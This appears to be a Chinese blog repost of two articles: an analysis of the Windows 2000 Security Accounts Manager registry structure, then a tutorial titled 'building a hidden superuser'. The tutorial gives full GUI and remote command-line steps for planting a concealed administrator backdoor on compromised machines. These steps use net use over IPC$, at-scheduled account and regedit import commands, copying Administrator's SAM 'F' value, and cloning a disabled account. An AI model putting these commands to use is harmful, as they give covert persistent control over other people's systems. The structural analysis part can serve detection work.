CSDN博客

img freexploit

解剖安全帐号管理器(SAM)结构

发表于2004/12/29 18:44:00  2698人阅读

分类: 木马后门 注册表研究

解剖安全帐号管理器(SAM)结构 来源:www.opengram.com  类别:黑客文献  日期:2002-5-1 6:28:30  今日/总浏览: 1/386  

Author: Refdom
Email : refdom@263.net
HomePage: www.opengram.com
2002/4/29


I、 摘要
II、 关于SAM
III、注册表中SAM数据库的结构
IV、 SAM数据库的结构和主要内容
V、 关于SAM数据库分析的结论

一、摘要
分析安全帐号管理器结构是在一个多月前做的事情了,只零碎地记录下片段,没有发布过。不发布的主要原因是安全帐户管理器(SAM)是WIN系统帐户管理的核心,并且非常系统化,我也有很多地方仅仅是进行的推断和猜测,同时,SAM hack可能造成启动时lsass.exe加载帐户管理器出错,即便是安全模式也不能修复(启动时候必然加载SAM)使得整个系统启动崩溃(我通常需要依靠第二系统删除SAM文件来启动)。至于现在发布出来,主要是因为Adam和叮叮的《克隆管理员帐号》种所描述的制作rootkit办法隐蔽性和危害性,对SAM的结构的熟悉,可以帮助安全维护人员做好安全检测(当然也可能让不良企图者利用)。
这里只介绍关于SAM的内容,同Security相关的暂时不公开。
二、关于SAM
不要误解了SAM,这不是一个文件sam这么简单。SAM(Security Accounts Manager安全帐户管理器)负责SAM数据库的控制和维护。SAM数据库位于注册表HKLM/SAM/SAM下,受到ACL保护,可以使用regedt32.exe打开注册表编辑器并设置适当权限查看SAM中的内容。SAM数据库在磁盘上就保存在%systemroot%system32/config/目录下的sam文件中,在这个目录下还包括一个security文件,是安全数据库的内容,两者有不少关系。
SAM数据库中包含所有组、帐户的信息,包括密码HASH、帐户的SID等。这些内容在后面详细介绍。以我分析的系统中文Win2K Adv Server为例。
三、注册表中SAM数据库的结构
展开注册表HKLM/SAM/SAM/:
HKLM---SAM
|---SAM
|---Domains
| |---Account
| | |---Aliases
| | | |---Members
| | | |---Names
| | |---Groups
| | | |---00000201
| | | |---Names
| | | |---None
| | |---Users
| | |---000001F4
| | |---000001F5
| | |---000003E8
| | |---000003E9
| | |---Names
| | |---Adaministrator
| | |---Guest
| | |---IUSR_REFDOM
| | |---IWASM_REFDOM
| |---Builtin
| |---Aliases
| | |---00000220
| | |---00000221
| | |---00000222
| | |---00000223
| | |---Members
| | | |---S-1-5-21-1214440339-706699826-1708537768
| | | |---000001F4
| | | |---000001F5
| | | |---000003E8
| | | |---000003E9
| | |--- Names
| | |---Administrators
| | |---Users
| | |---Guests
| | |---Power Users
| |---Groups
| | |---Names
| |
| |---Users
| |---Names
|
|---RXACT
这是我机器上注册表中的SAM树。
对照SAM文件中的内容,可以看出,注册表中的SAM树实际上就是SAM文件中一样。不过,SAM文件中是先列RXACT然后在是Domains内容(以此类推),文件中的表达顺序和注册表中的树形顺序是相反的。如果习惯于看文件内容,从文件的0000h到0006Ch,表示的是SAM数据库所在的位置:/systemroot/system32/config/sam,然后是一端空白,直到01000h(hbin),从这里开始就是整个数据库的内容。SAM数据库的文件内容不作主要介绍,不过会穿插着介绍,有兴趣可以自己去研究。
四、SAM数据库的结构和主要内容:
在整个数据库中,帐号主要内容存在于下面这些位置:
在/Domains/下就是域(或本机)中的SAM内容,其下有两个分支“Account”和“Builtin”。
/Domains/Account是用户帐号内容。
/Domains/Account/Users下就是各个帐号的信息。其下的子键就是各个帐号的SID相对标志符。比如000001F4,每个帐号下面有两个子项,F和V。其中/Names/下是用户帐号名,每个帐号名只有一个默认的子项,项中类型不是一般的注册表数据类型,而是指向标志这个帐号的SID最后一项(相对标识符),比如其下的Administrator,类型为0x1F4,于是从前面的000001F4就对应着帐户名administrator的内容。由此可见MS帐号搜索的逻辑。
推断一:从注册表中结构来看帐号,如果查询一个帐户名refdom的相关信息,那么,微软从帐号名refdom中找到其类型0x3EB,然后查找相对标志符(或者SID)为000003EB的帐号内容。所有的API函数(比如NetUserEnum())都是这样来执行的。因此,如果改变refdom帐号中的类型0x3EB为0x1F4,那么这个帐号将被指向类000001F4的帐
户。而这个帐号000001F4就是administrator帐户,这样,系统在登录过程中就把refdom帐号完全转为了administrator帐号,帐号refdom所使用的所有内容、信息都是adminisrtator内容,包括密码、权限、桌面、记录、访问时间等等。这个推断应该成立,但是,将意味着两个用户名对应一个用户信息,系统启动上应该会发生错误!
推断一是在以前分析结构的时候即得出了,揭示了登录过程中及之后帐户名和SID关联的关系。
/Domains/Account/Users/000001F4,这就是administrator的帐户信息(其他类似)。其中有两个子项V和F。项目V中保存的是帐户的基本资料,用户名、用户全名(full name)、所属组、描述、密码hash、注释、是否可以更改密码、帐户启用、密码设置时间等。项目F中保存的是一些登录记录,比如上次登录时间、错误登录次数等,还
有一个重要的地方就是这个帐号的SID相对标志符。
以前分析结构的时候没有留意到这个地方,这就是Adam提出的思路。这个地方就是这个SID相对标志符在注册表中一个帐号出现了两遍,一个是在子键000001F4,另一个地方就是子键中项F的内容里面,从48到51的四个字节:F4 01 00 00,这实际上是一个long类型变量,也就是00 00 01 F4。当一个标志出现在两个地方的时候就将发生同步问题。明显,微软犯了这个毛病。两个变量本应该统一标志一个用户帐号,但是微软把两个变量分别发挥各自的作用,却没有同步统一起来。
子键中000001F4用来同用户名administrator对应,方便通过用户查询帐户信息,比如LookupAccountSid()等帐号相关API函数都是通过这个位置来定位用户信息的,这个关联应该是用在了帐户登录以后。而项目V值中的 F4 01 00 00是同帐户登录最直接相关联的。
推断二:WIN登录的时候,将从SAM中获得相对标志符,而这个相对标志符的位置是V值中的 F4 01 00 00。但是,帐户信息查询却使用的SAM中子键内容。
推断二的原因假设(假设一):在帐户登录的时候,登录过程获得SAM数据库中用户名使用的帐户记录信息中的相对标志符值(相当于V值中的 F4 01 00 00),帐户登录之后,所有跟帐户相关的之后,这个值不再被API函数使用,而相对标志符由一个数据记录项的字段名代替(相当于子键000001F4)。微软犯了一个同步逻辑问题!
推断二是根据Adam提出而进行的,以前没有这样推断过。:( 推断二如果成立,揭示了在登录过程中帐户SID进行的过程。这就是为什么V中的值都是跟帐户登录记录(登录时间,密码错误次数等)相关的原因。同时,因为F中保存了一个用户名内容,而API函数查询的是这个用户名,所以Adam的克隆办法还是容易露脸,经叮叮补充过后,这个用户名也被恢复原用户名了,从用户名上检测就相对难了。
上面对项目V的介绍可以知道,其中保存的是帐户的基本资料,用户名、用户全名(full name)、所属组、描述、密码hash、注释、是否可以更改密码、帐户启用、密码设置时间等。现在来关心的是密码HASH。
假设二:在帐户的项V中,包含了用户HASH,分别包括是LM2和NT的密码加密散列,Crack时,可分开进行。毕竟LM2简单。

/Domains/Builtin下的内容是同帐户组相关的。其结构同/Account下的类似,并且也存在相应的问题,就不再罗嗦了。
SAM数据库保存的文件sam中,可没有注册表中的这么简明的内容,而主要是通过偏移量、长度来定位内容。并且单个帐号的信息都是集中在一块的,而不是象注册表形式这样分隔开(名字的一个键而内容在另外一个键)。
sam文件中,可根据这些下面这些分隔符来定位数据含义:
nk (6E 6B) 键或者子键名
vk (76 6B) 相应的值
if (6C 66) 子键列表
sk (73 6B) 权限

五、关于SAM数据库分析的结论:
SAM HACK是非常有危险性的。不正确的修改会将系统的安全数据管理器破坏,造成系统启动问题,虽然可以通过删除SAM文件来让启动恢复。如果能够熟悉SAM的结构,你将发现,可以对用户名与用户名之间、用户组与用户组之间进行调换,以及帐户和帐户组伪造,完全打破微软的帐户格局。并且非常隐蔽,让帐户相关的API函数摸不着头脑。
虽然微软处理帐号信息中犯了不少逻辑问题,但是安全帐号数据库并非不安全,所有操作都必须能完全拥有管理员权限。
当隐蔽后门的办法被提出来之后,一定会让不少“黑客”利用,管理员也应该多多熟悉相关技术,作好安全检测,我的目的就达到了。对《克隆管理员帐号》的简单检测工具可以在我的主页(www.opengram.com)下载,但是更多的还是需要管理员学习相关知识,才能更好地检测入侵。

 

 

建立隐藏的超级用户

 来源:不明  类别:安全文献  日期:2003-2-8 11:22:08  今日/总浏览: 1/1071  

 

前几天在某个网站(记不清了,不好意思 ^_*)上看到了一篇介绍如何建立隐藏的超级用户的图文教程,给我了很大的启发,作者只说明了如何在本地图形界面下建立隐藏的超级用户,且作者说他无法在命令行下实现隐藏的超级用户的建立,于是我就开始自已摸索,刚开始时,我用reg.exe(3.0版)作为命令行下导出导入注册表文件的工具,但每次导入以后,建立的隐藏的超级用户总不能用,后来打开注册表查看,发现这个隐藏的超级用户的默认数据类型并没有被导入注册表。由于这种数据类型是十六进制数表示的(如administrator的默认数据类型为000001F4,下面例子中的hacker$的数据类型是00000409)而不是我们常说的字符串型、dword型、二进制型等数据类型,reg.exe不能识别,因而也就无法导入,而在图形界面下用注册表编辑器regedit.exe却能够将这种数据类型导入,后来一想regedit.exe是一个两栖程序,它既可以在windows界面下运行,也可以在DOS下运行,既然图形界面regedit.exe能够导入这种数据类型,那么DOS下面的它也应该能够导入这种数据类型,后来经试验证明了我的想法。下面我把我实现这个隐藏的超级用户建立方法介绍如下:
一、如何在图形界面建立隐藏的超级用户
图形界面下适用本地或开3389终端服务的肉鸡上。上面我提到的那位作者说的方法很好,但是较为复杂,还要用到psu.exe(让程序以系统用户身份运行的程序),如果在肉鸡上的话还要上传psu.exe。我说的这个方法将不用到psu.exe这个程序。因为windows2000有两个注册表编辑器:regedit.exe和regedt32.exe。XP中regedit.exe和regedt32.exe实为一个程序,修改键值的权限时在右键中点“权限”来修改。对regedit.exe我想大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE/SAM/SAM键下,但是除了系统用户SYSTEM外,其它用户都无权查看到里面的信息,因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下:
1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的,首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户
net user hacker$ 1234 /add
2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。
3、点“权限”以后会弹出窗口
点添加将我登录时的帐户添加到安全栏内,这里我是以administrator的身份登录的,所以我就将administrator加入,并设置权限为“完全控制"。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组,切莫修改原有的帐户或组,否则将会带来一系列不必要的问题。等隐藏超级用户建好以,再来这里将你添加的帐户删除即可。
4、再点“开始”→“运行”并输入"regedit.exe" 回车,启动注册表编辑器regedit.exe。
打开键:HKEY_LOCAL_MAICHINE/SAM/SAM/Domains/account/user/names/hacker$"
5、将项hacker$、00000409、000001F4导出为hacker.reg、409.reg、1f4.reg,用记事本分别打这几个导出的文件进行编辑,将超级用户对应的项000001F4下的键"F"的值复制,并覆盖hacker$对应的项00000409下的键"F"的值,然后再将00000409.reg与hacker.reg合并。
6、在命令行下执行net user hacker$ /del将用户hacker$删除:net user hacker$ /del
7、在regedit.exe的窗口内按F5刷新,然后打文件-导入注册表文件将修改好的hacker.reg导入注册表即可
8、到此,隐藏的超级用户hacker$已经建好了,然后关闭regedit.exe。在regedt32.exe窗口内把HKEY_LOCAL_MACHINE/SAM/SAM键权限改回原来的样子(只要删除添加的帐户administrator即可)。
9、注意:隐藏的超级用户建好后,在帐户管理器看不到hacker$这个用户,在命令行用“net user”命令也看不到,但是超级用户建立以后,就不能再改密码了,如果用net user命令来改hacker$的密码的话,那么在帐户管理器中将又会看这个隐藏的超级用户了,而且不能删除。

如何在命令行下远程建立隐藏的超级用户
在这里将用at的命令,因为用at产生的计划任务是以系统身份运行的,所以也用不到psu.exe程序。为了能够使用at命令,肉鸡必须开有schedule的服务,如果没有开启,可用流光里带的工具netsvc.exe或sc.exe来远程启动,当然其方法也可以,只要能启动schedule服务就行。
对于命令行方式,你可以采用各种连接方式,如用SQLexec连接MSSQL的1433端口,也可以用telnet服务,只要以你能得到一个cmdshell,并且有运行at命令的权限就可以。
1、首先找到一台肉鸡,至于如何来找那不是我这里所说的话题。这里先假设找到一台超级用户为administrator,密码为12345678的肉鸡,现在我们开始在命令行下远程为它建立隐藏的超级用户。(例子中的主机是我的局域网内的一台主机,我将它的ip地址改为13.50.97.238,,请勿在互联网上对号入座,以免骚扰正常的ip地址。)
2、先与肉鸡建立连接,命令为: net use //13.50.97.238/ipc$ "12345678" /user:"administrator
3、用at命令在肉鸡上建立一个用户(如果at服务没有启动,可用小榕的netsvc.exe或sc.exe来远程启动):at //13.50.97.238 12:51
c:/winnt/system32/net.exe user hacker$ 1234 /add
建立这个加有$符的用户名,是因为加有$符后,命令行下用net user将不显示这个用户,但在帐户管理器却能看到这个用户。
4、同样用at命令导出HKEY_LOCAL_MACHINE/sam/sam/Domains/account/users下键值:at //13.50.97.238 12:55
c:/winnt/regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/
/e 是regedit.exe的参数,在_LOCAL_MACHINE/SAM/SAM/Domains/account/users/这个键的一定要以/结尾。必要的情况下可以用引号将"c:/winnt/regedit.exe /e hacker.reg HKEY_LOCAL_MACHINE/SAM/SAM/Domains/account/users/"引起来。
5、将肉鸡上的hacker.reg下载到本机上用记事本打开进行编辑命令为:copy //13.50.97.238/admin$/system32/hacker.reg
c:/hacker.reg
修改的方法图形界中已经介绍过了,这里就不作介绍了。
6、再将编辑好的hacker.reg拷回肉鸡上 copy c:/hacker.reg //13.50.97.238/admin$/system32/hacker1.reg
7、查看肉鸡时间:net time //13.50.97.238 然后用at命令将用户hacker$删除:
at //13.50.97.238 13:40 net user hacker$ /del
8、验证hacker$是否删除:用
net use //13.50.97.238 /del 断开与肉鸡的连接。
net use //13.50.97.238/ipc$ "1234" /user:"hacker$" 用帐户hacker$与肉鸡连接,不能连接说明已删除。
9、再与肉鸡建立连接:net use //13.50.97.238/ipc$ "12345678" /user:"administrator"
再取得肉鸡时间,用at命令将拷回肉鸡的hacker1.reg导入肉鸡注册表:
at //13.50.97.238 13:41 c:/winnt/regedit.exe /s hacker1.reg
regedit.exe的参数/s是指安静模式。
10、再验证hacker$是否已建立,方法同上面验证hacker$是否被删除一样。
11、再验证用户hacker$是否有读、写、删的权限,如果不放心,你还可验证是否能建立其它帐户。
12、通过11可以断定用户hacker$具有超级用户权限,因为最初我用at命令建立它的时候是一个普通用户,而现在却具有远程读、写、删的权限。
三、如果肉鸡没有开3389终端服务,而我又不想用命令行,怎么办?
这种情况下,你也可以用界面方式来远程为肉鸡建立隐藏的超级用户。因为regedit.exe、regedt32.exe都有连接网络注册表的功能,你可以用regedt32.exe来为远程主机的注册表项设置权限,用regedit.exe来编辑远程注册表。帐户管理器也有一项连另一台计算机的功能,你可以用帐户管理器为远程主机建立和删除帐户。具体步聚与上面介绍的相似,我就不多说了,只它的速度实在是令人难以忍受。
但是这里有两个前提:1、先用net use //肉鸡ip/ipc$ "密码" /user:"超级用户名"来与远程主机建立连接以后,才能用regedit.exe regedt32.exe及帐户管理器与远程主机连接。
2、远程主机必须开启远程注册表服务(没有开启的话,你也可以远程开启,因为你有超级用户的密码了)。
四、利用被禁用的帐户建立隐藏的超级用户:
我们可以用肉鸡上被禁止的用户来建立隐藏的超组用户.方法如下:
1.想办法查看有哪些用户被细心的管理员禁止,一般情况下,有些管理员出于安全考虑,通常会将guest禁用,当然了会禁用其它用户。在图形界面下,非常容易,只要在帐户管理器中就可以看到被禁用的帐户上有一个红叉;而在命令行下,我还没有想到好的办法,只能在命令行下用命令:"net user 用户名"一个一个来查看用户是否被禁用。
2.在这里,我们假设用户hacker被管理员禁用。首先,我先用小榕的超组用户克隆程序CA.exe,将被禁用的用户hacker 克隆成超级用户(克隆之后,被禁用的用户hacker就会自动被激活了): CA.EXE //肉鸡ip Administrator 超级用户密码 hacher hacher密码。
3.如果你现在一个cmdshell,如利用telnet服务或SQLEXEC连接肉鸡的msSQL的默认端口1433得到的shell都可以,这时你只要输入命令:
net user hacker /active:no 这样用户hacker就被禁用了(至少表面上是这样的),当然你也可以将用户hacher换成其它的被禁用的用户。
4.这时如果你在图形界面下看帐户管理器中的用户时,会发现用户hacker被禁用了,但事实上是这样的吗?你用这个被禁用的用户连接一下肉鸡看看是否能连上?用命令:net user //肉鸡ip/ipc$ "hacker密码" /user:"hacker" 连一连看看。我可以告诉大家,经过我多次试验,次次都能成功,而且还是超级用户权限。
5.如果没有cmdshell怎么办?你可以我上面介绍的at命令来禁用用户hacker;命令格式:at //肉鸡ip 时间 net user hacker /active:no
6.原理:具体的高深的原理我也说不上来,我只能从最简单的说。你先在图形界面下在帐户管理器中禁用一下超级用户administrator看看,肯定会弹出一对话框,并禁止你继续禁用超级用户administrator,同样,因为在克隆时,hacker在注册表的"F"键被超级用户administrator在注册表的"F"键所替代,因而hacker就具有了超级用户的权限了,但是由于hacker在注册表内"C"健还是原来的"C"键,所以hacker还是会被禁用,但是它的超级用户权限却不会被禁用,因此被禁用的用户hacker还是可以连接肉鸡,而且还具有超级用户的权限。具体我也说不明白,大家权且这么理解吧。
五、注意的几点事项:
1、隐藏的超级用户建立以后,在帐户管理器中和命令行下均看不到这个用户,但这个用户却存在。
2、隐藏的超级用户建立以后,就不能再修改密码了,因为一旦修改密码,这个隐藏的超级用户就会暴露在帐户管理器中,而且不能删除。
3、如在本机上试验时,最好用系统自带的备份工具先备份好本机的“系统状态”主要是注册表的备份,因为本人做试验时,曾出现过帐户管理器中看不到任何用户,组中也看不到任何组的现象,但它们却存在。幸好我有备份,呵呵。SAM键是毕竟系统最敏感的部位。
4、本方法在2000/XP上测试通过,未在NT上测试。本方法仅供研究,请勿将本方法用于破坏上,利用本方法造成严重后果者,由使用者负责,本人概不负责。

 

0 0

相关博文

我的热门文章

img
取 消
img即使是一小步
也想与你分享
打开
img